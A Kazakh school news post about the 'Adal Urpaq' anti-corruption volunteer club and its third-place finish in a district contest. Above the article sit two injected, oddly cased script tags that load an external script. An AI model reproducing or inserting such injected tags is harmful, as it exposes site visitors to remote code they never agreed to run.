<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

06.10.2017

Жастар жемқорлыққа қарсы

Мектебімізде тәрбие жұмысын ұйымдастыруға жәрдемдесетін «Адал Ұрпақ» еріктілер клубы 2016/2017 оқу жылы құрылды. «Ел боламын десең, бесігіңді түзе», - деп атам қазақ айтқандай осы «Адал Ұрпақ» клубының берер үлгі өнегесі өте терең. Жас ұрпақты Отансүйгіштікке, адалдыққа, руханилыққа, патриоттық, азаматтық сезімдерін дамытып, өсіріп-өндіруге мектеп қабырғасында көптеген елеулі істер бастау алып жатыр.

Мектеп аға тәлімгері жетекшілігімен клуб мүшелері жемқорлыққа қарсы дәрістер, дөңгелек үстел, бейнероликтер мен суреттер көрмесін ұйымдастыруға ұйытқы болып, флешмобтар дайындап, пікір-сайыс ойындарын өткізіп жүр. Зияны қандай, оны неге болдырмау керек, жалғыз материалдық жағынан ғана емес сонымен қатар рухани жағынан да , пара алған жағдайда сенің жан дүниең тиыш болмайтыны жайында жан-жақты талқылап, оқушыларға жеткізіп, санасына құйылды.

Осыған байланысты ауданымызда 29 қыркүйек күні «Үздік Адал Ұрпақ» сайысы өткізілді. Біздің мектептен 6 ерікті мектеп клуб мүшелері қатысты. Арнайы төс белгілері, плакаттар, суреттер тақырыпқа байланысты салынды.

Сайыс 3 кезеңнен тұрды, яғни «таныстыру», «презентация» - клубтың 2016/2017 оқу жылында істелген жұмыстары, «видеотаспа» - клубтың 1 күндік жұмысы жайында болды. Мектеп оқушылары сайыстан сүрінбей өтіп, 14 мектептің ішінен жүлделі ІІІ-орынға ие болды.

«Адал Ұрпақ» еріктілер мектеп клубының мүшелері адалдық, парасаттық сезімдерін ұштастырып, жемқорлықсыз әлемге нық қадам басады деген сенімдемін.

Аға тәлімгер: Муханжанова М.К

Просмотров: 622


Пікір қосу



Деректерді қолтаңбаға қосу